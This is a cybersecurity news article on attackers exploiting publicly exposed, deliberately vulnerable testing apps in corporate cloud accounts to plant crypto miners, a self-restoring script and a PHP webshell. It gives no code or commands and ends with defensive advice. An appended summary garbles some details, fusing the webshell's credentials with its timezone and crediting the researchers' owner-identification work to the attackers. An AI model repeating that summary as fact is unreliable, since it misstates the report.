Hackers exploit security testing apps to breach Fortune 500 firms

News

Featured
Latest

Credential-stealing Chrome extensions target enterprise HR platforms

Microsoft releases OOB Windows updates to fix shutdown, Cloud PC bugs

Jordanian pleads guilty to selling access to 50 corporate networks

Ingram Micro says ransomware attack affected 42,000 people

You Got Phished? Of Course! You're Human...

Hackers exploit security testing apps to breach Fortune 500 firms

GitLab warns of high-severity 2FA bypass, denial-of-service flaws

Tesla hacked, 37 zero-days demoed at Pwn2Own Automotive 2026

Tutorials

Latest
Popular

How to access the Dark Web using the Tor Browser

How to enable Kernel-mode Hardware-enforced Stack Protection in Windows 11

How to use the Windows Registry Editor

How to backup and restore the Windows Registry

How to start Windows in Safe Mode

How to remove a Trojan, Virus, Worm, or other Malware

How to show hidden files in Windows 7

How to see hidden files in Windows

Webinars
Downloads

Latest
Most Downloaded

Qualys BrowserCheck

STOPDecrypter

AuroraDecrypter

FilesLockerDecrypter

AdwCleaner

ComboFix

RKill

Junkware Removal Tool

Deals

Categories

eLearning

IT Certification Courses

Gear + Gadgets

Security

VPNs

Popular

Best VPNs

How to change IP address

Access the dark web safely

Best VPN for YouTube

Forums
More

Virus Removal Guides
Startup Database
Uninstall Database
Glossary
Send us a Tip!
Welcome Guide

HomeNewsSecurityHackers exploit security testing apps to breach Fortune 500 firms

Hackers exploit security testing apps to breach Fortune 500 firms

By Bill Toulas

January 21, 2026
09:00 AM
0

Threat actors are exploiting misconfigured web applications used for security training and internal penetration testing, such as DVWA, OWASP Juice Shop, Hackazon, and bWAPP, to gain access to cloud environments of Fortune 500 companies and security vendors.
An investigation from automated penetration testing company Pentera found evidence that hackers are leveraging this attack vector to compromise systems and deploy crypto miners, plant webshells, or pivot to sensitive systems. 
The testing web apps are intentionally vulnerable and represent a serious compromise risk when exposed on the public internet and executed from a privileged cloud account.

Pentera researchers found 1,926 live, vulnerable applications exposed on the public web, often linked to overly privileged IAM (Identity and Access Management) roles and deployed on AWS, GCP, and Azure cloud environments.

Overview of exposed testing web apps
Source: Pentera Labs
According to Pentera, the exposed apps belong to multiple Fortune 500 companies, including Cloudflare, F5, and Palo Alto Networks, which received the researchers' findings and have fixed the issues.
Many of those instances exposed cloud credential sets, did not follow ‘least-privilege’ recommended practices, and in more than half of the cases, still used default credentials, allowing for easy takeover.
The credentials Pentera discovered in the investigation could give attackers full access to S3 buckets, GCS, and Azure Blob Storage, read and write permission to Secrets Manager, interact with container registries, and gain admin access to the cloud environment.

Accessing the Secrets Manager on an exposed AWS accountSource: Pentera Labs
Active exploitation underway
In a report shared with BleepingComputer, Pentera Labs confirmed that the risk was not theoretical and that hackers have already exploited these entry points.
"During the investigation, we discovered clear evidence that attackers are actively exploiting these exact attack vectors in the wild – deploying crypto miners, webshells, and persistence mechanisms on compromised systems," the researchers said.
Proof of compromise emerged when assessing several misconfigured, vulnerable applications. The researchers established shells on the machines and enumerated data in an effort to determine their owners.
"Out of the 616 discovered DVWA instances, around 20% were found to contain artifacts deployed by malicious actors," Pentera says in the report.
The cryptocurrency mining activity used the XMRig tool, which was actively mining Monero (XMR) cryptocurrency in the background.

Activating the XMRig minerSource: Pentera Labs
The researchers also found an advanced persistence mechanism using a script named ‘watchdog.sh’. If deleted, the script restored itself from a base64-encoded backup and downloads XMRig from GitHub again.

Re-downloading the miner from GitHubSource: Pentera Labs
The script also downloads from a Dropbox account additional tools encrypted using the AES-256 cipher, and kills competing miners present on the compromised host.
Other cases involve the deployment of a PHP webshell named ‘filemanager.php’ that supports file actions (read, write, delete, download, upload) and command execution.
The webshell contained hardcoded authentication credentials and had a timezone set to Europe/Minsk (UTC+3), which could be a hint about the origin of the operators.
Pentera clarifies that these malicious artifacts were discovered after notifying Cloudflare, F5, and Palo Alto, and the companies remediated the issues.
The researchers recommend that organizations maintain a comprehensive inventory of all cloud resources, including testing apps, and isolate them from production environments.
Also, least-privilege IAM roles for non-production systems should be enforced, default credentials should be changed, and automatic expiration should be set up for temporary resources.
Pentera's report provides a detailed description of the steps in the investigation and includes information on the tools and methods used to discover and probe vulnerable instances, and to identify their owners.

7 Security Best Practices for MCP
As MCP (Model Context Protocol) becomes the standard for connecting LLMs to tools and data, security teams are moving fast to keep these new services safe.
This free cheat sheet outlines 7 best practices you can start using today.
Download Now

Related Articles:
Amazon: Ongoing cryptomining campaign uses hacked AWS accountsHackers now exploiting critical Fortinet FortiSIEM flaw in attacksCisco finally fixes AsyncOS zero-day exploited since NovemberHackers exploit Modular DS WordPress plugin flaw for admin accessHackers exploit authentication bypass in Palo Alto Networks PAN-OS

Actively Exploited
Cloud
Miner
Testing
Web Application
Web Shell
XMRig

Bill Toulas
Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.

Previous Article
Next Article

Post a Comment Community Rules

You need to login in order to post a comment
Not a member yet? Register Now

You may also like:

Popular Stories

Microsoft releases OOB Windows updates to fix shutdown, Cloud PC bugs

Ingram Micro says ransomware attack affected 42,000 people

New PDFSider Windows malware deployed on Fortune 100 firm's network

Sponsor Posts

Identity Governance & Threat Detection in one: Get a guided tour of our platform

Discover how to scale IT infrastructure reliably without adding toil or burnout.

Discover how phishing kits are sold and deployed. Download the full research report.

  Upcoming Webinar

Follow us:

Main Sections

News
Webinars
VPN Buyer Guides
SysAdmin Software Guides
Downloads
Virus Removal Guides
Tutorials
Startup Database
Uninstall Database
Glossary

Community

Forums
Forum Rules
Chat

Useful Resources

Welcome Guide
Sitemap

Company

About BleepingComputer
Contact Us
Send us a Tip!
Advertising
Write for BleepingComputer
Social & Feeds
Changelog

Terms of Use - Privacy Policy - Ethics Statement - Affiliate Disclosure

Copyright @ 2003 - 2026 Bleeping Computer® LLC - All Rights Reserved

Login

Username

Password

Remember Me

Sign in anonymously

Sign in with Twitter

Not a member yet? Register Now

Reporter

Help us understand the problem. What is going on with this comment?

Spam

Abusive or Harmful

Inappropriate content

Strong language

Other

Read our posting guidelinese to learn what content is prohibited.

Submitting...
SUBMIT

This report details a concerning trend: hackers are actively exploiting commonly used security testing applications – DVWA, OWASP Juice Shop, Hackazon, and bWAPP – to gain unauthorized access to the cloud environments of Fortune 500 companies and security vendors. Pentera Labs uncovered over 1,926 live, vulnerable instances of these applications exposed on the public web, often linked to overly privileged Identity and Access Management (IAM) roles within cloud environments such as Amazon Web Services (AWS), Google Cloud Platform (GCP), and Microsoft Azure. The investigation revealed that these vulnerabilities were not merely theoretical risks, but were being actively exploited with tangible consequences.

Specifically, the researchers identified the deployment of cryptocurrency miners (using the XMRig tool), webshells (such as a PHP file manager capable of file manipulation and command execution), and persistent mechanisms designed to automatically reinstall the malware if deleted. The malicious actors utilized techniques like downloading additional tools encrypted with AES-256 and killing competing miners. A key element of the attack involved the use of ‘watchdog.sh’, a script that would restore itself after deletion, coupled with hardcoded authentication credentials set to Europe/Minsk (UTC+3), providing a potential clue about the origin of the attackers.

The findings significantly impact organizations like Cloudflare, F5, and Palo Alto Networks, which were directly notified by Pentera and subsequently remediated the vulnerabilities. The report underscores the importance of maintaining a comprehensive inventory of all cloud resources, including security testing applications. Furthermore, the researchers strongly recommended implementing least-privilege IAM roles for non-production systems, regularly changing default credentials, and setting automatic expiration for temporary cloud resources.

The active exploitation discovered by Pentera highlighted serious weaknesses in security practices, demonstrating the willingness of malicious actors to leverage readily available, intentionally vulnerable tools. The methodology employed by the attackers, including the deployment of persistent malware and the use of network analysis to identify targets and owners, exemplifies a sophisticated and targeted approach. This situation emphasizes the necessity for organizations to proactively identify and mitigate vulnerabilities in their cloud environments, recognizing that even seemingly innocuous testing applications can pose a credible threat when exposed and misconfigured. The ability of attackers to rapidly deploy tools like XMRig and actively monitor compromised systems underscores the need for robust security monitoring and incident response capabilities within these firms.